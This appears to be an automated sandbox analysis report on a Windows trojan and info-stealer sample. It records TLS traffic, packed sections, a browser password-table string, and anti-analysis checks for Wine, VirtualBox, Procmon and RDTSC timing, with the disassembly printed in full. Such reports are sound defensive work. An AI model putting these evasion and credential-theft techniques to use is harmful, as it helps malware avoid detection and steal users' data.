Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49712 version: TLS 1.2

              System Summary

              Source: QQ5BxgG5G6.exe Static PE information: section name:
              Source: QQ5BxgG5G6.exe Static PE information: section name: .idata
              Source: QQ5BxgG5G6.exe Static PE information: section name:
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_015E3E1B
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_015D4EA7
              Source: QQ5BxgG5G6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: QQ5BxgG5G6.exe Static PE information: Section: ZLIB complexity 0.9973177975171232
              Source: QQ5BxgG5G6.exe Static PE information: Section: irlkmphe ZLIB complexity 0.9946247931708785
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1487412265.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1487198740.0000000005C76000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: QQ5BxgG5G6.exe Virustotal: Detection: 56%
              Source: QQ5BxgG5G6.exe ReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File read: C:\Users\user\Desktop\QQ5BxgG5G6.exe
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: webio.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Section loaded: ondemandconnroutehelper.dll
              Source: QQ5BxgG5G6.exe Static file information: File size 1866752 > 1048576
              Source: QQ5BxgG5G6.exe Static PE information: Raw size of irlkmphe is bigger than: 0x100000 < 0x19f800

              Data Obfuscation

              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Unpacked PE file: 0.2.QQ5BxgG5G6.exe.d00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;irlkmphe:EW;zsmofqts:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;irlkmphe:EW;zsmofqts:EW;.taggant:EW;
              Source: initial sample Static PE information: section where entry point is pointing to: .taggant
              Source: QQ5BxgG5G6.exe Static PE information: real checksum: 0x1d5585 should be: 0x1d2088
              Source: QQ5BxgG5G6.exe Static PE information: section name:
              Source: QQ5BxgG5G6.exe Static PE information: section name: .idata
              Source: QQ5BxgG5G6.exe Static PE information: section name:
              Source: QQ5BxgG5G6.exe Static PE information: section name: irlkmphe
              Source: QQ5BxgG5G6.exe Static PE information: section name: zsmofqts
              Source: QQ5BxgG5G6.exe Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_0161EAA0 push A00161CDh; retf 0_3_0161EAA5
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_0161C829 push ebx; iretd 0_3_0161C82A
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_0161EDB2 pushad ; iretd 0_3_0161EE25
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_015CEA4C push eax; ret 0_3_015CEA4D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_015CFBC0 pushfd ; iretd 0_3_015CFBC5
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_015CF404 push esp; retf 0_3_015CF409
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_015D51BF push cs; iretd 0_3_015D51C0
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_0162CF3A push esp; iretd 0_3_0162CF3D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_0162A2CB push edi; iretd 0_3_0162A2E9
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_0162B0D7 push ds; ret 0_3_0162B120
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_016282A4 push esi; retf 0_3_016282E1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_01628087 push ds; retf 0_3_016280A1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Code function: 0_3_0162AE9C push cs; retf 0_3_0162AFB2
              Source: QQ5BxgG5G6.exe Static PE information: section name: entropy: 7.976685919337456
              Source: QQ5BxgG5G6.exe Static PE information: section name: irlkmphe entropy: 7.95433500185407

              Boot Survival

              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: D583DB second address: D57C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D3084h], ecx 0x00000010 push dword ptr [ebp+122D16C9h] 0x00000016 pushad 0x00000017 mov esi, dword ptr [ebp+122D3ADAh] 0x0000001d mov di, 74DBh 0x00000021 popad 0x00000022 call dword ptr [ebp+122D305Ch] 0x00000028 pushad 0x00000029 cmc 0x0000002a xor eax, eax 0x0000002c add dword ptr [ebp+122D2C5Ch], ebx 0x00000032 sub dword ptr [ebp+122D2C5Ch], ecx 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jmp 00007F88DD0CB152h 0x00000041 mov dword ptr [ebp+122D3ABEh], eax 0x00000047 pushad 0x00000048 mov ecx, 32B1ADF2h 0x0000004d cld 0x0000004e popad 0x0000004f mov esi, 0000003Ch 0x00000054 jmp 00007F88DD0CB14Ah 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d cld 0x0000005e lodsw 0x00000060 jmp 00007F88DD0CB14Fh 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 jmp 00007F88DD0CB14Ch 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 pushad 0x00000073 sbb edi, 4D8821E9h 0x00000079 mov dword ptr [ebp+122D2C5Ch], edi 0x0000007f popad 0x00000080 cmc 0x00000081 nop 0x00000082 push ecx 0x00000083 jmp 00007F88DD0CB14Bh 0x00000088 pop ecx 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c jnc 00007F88DD0CB14Ch 0x00000092 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDAE02 second address: EDAE1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD042h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: ED9E73 second address: ED9E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: ED9E89 second address: ED9E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: ED9E8F second address: ED9EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a je 00007F88DD0CB146h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDA1B2 second address: EDA1C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDA1C6 second address: EDA1D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F88DD0CB146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDA1D1 second address: EDA1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDA359 second address: EDA35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDA4C5 second address: EDA4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDA4CA second address: EDA4CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDA4CF second address: EDA4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: ED25A4 second address: ED25AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDBA3 second address: EDDBA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDBA9 second address: EDDBC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DD0CB157h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDBC4 second address: EDDBFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F88DC6CD042h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 je 00007F88DC6CD04Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F88DC6CD03Eh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDC92 second address: EDDCE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D36EAh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F88DD0CB148h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c movzx ecx, cx 0x0000002f mov dword ptr [ebp+122D2032h], ebx 0x00000035 call 00007F88DD0CB149h 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007F88DD0CB14Ch 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDCE3 second address: EDDCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDCE7 second address: EDDD1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F88DD0CB159h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jmp 00007F88DD0CB14Eh 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDD1C second address: EDDD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDD20 second address: EDDD24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDF2E second address: EDDF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDF34 second address: EDDF5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F88DD0CB14Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jl 00007F88DD0CB14Ch 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDF5F second address: EDDF6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDDF6E second address: EDDF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE02D second address: EDE031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE031 second address: EDE08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F88DD0CB14Bh 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F88DD0CB157h 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D309Eh], esi 0x0000001b push 00000000h 0x0000001d mov cx, E937h 0x00000021 call 00007F88DD0CB149h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F88DD0CB14Ah 0x0000002e jmp 00007F88DD0CB14Dh 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE08E second address: EDE0AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jmp 00007F88DC6CD03Ah 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE0AD second address: EDE0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE0B1 second address: EDE0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE0B7 second address: EDE0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE0BD second address: EDE13C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F88DC6CD03Bh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jno 00007F88DC6CD049h 0x00000019 pop eax 0x0000001a mov dx, di 0x0000001d push 00000003h 0x0000001f adc dh, 00000075h 0x00000022 mov dword ptr [ebp+122D1C20h], ebx 0x00000028 push 00000000h 0x0000002a mov edx, 09E59F1Bh 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F88DC6CD038h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b pushad 0x0000004c mov edi, dword ptr [ebp+122D1EA4h] 0x00000052 popad 0x00000053 call 00007F88DC6CD039h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d push edi 0x0000005e pop edi 0x0000005f popad 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE13C second address: EDE146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F88DD0CB146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE146 second address: EDE14A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE14A second address: EDE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F88DD0CB14Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE166 second address: EDE16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE16B second address: EDE171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE171 second address: EDE175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE175 second address: EDE185 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE185 second address: EDE220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F88DC6CD036h 0x0000000a popad 0x0000000b jmp 00007F88DC6CD043h 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 jnc 00007F88DC6CD04Fh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jmp 00007F88DC6CD042h 0x00000023 push eax 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pop eax 0x00000027 popad 0x00000028 pop eax 0x00000029 pushad 0x0000002a sub dx, 9786h 0x0000002f popad 0x00000030 lea ebx, dword ptr [ebp+12459ABCh] 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F88DC6CD038h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 mov si, di 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 pop eax 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE220 second address: EDE226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EDE226 second address: EDE233 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe RDTSC instruction interceptor: First address: EFC099 second address: EFC0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
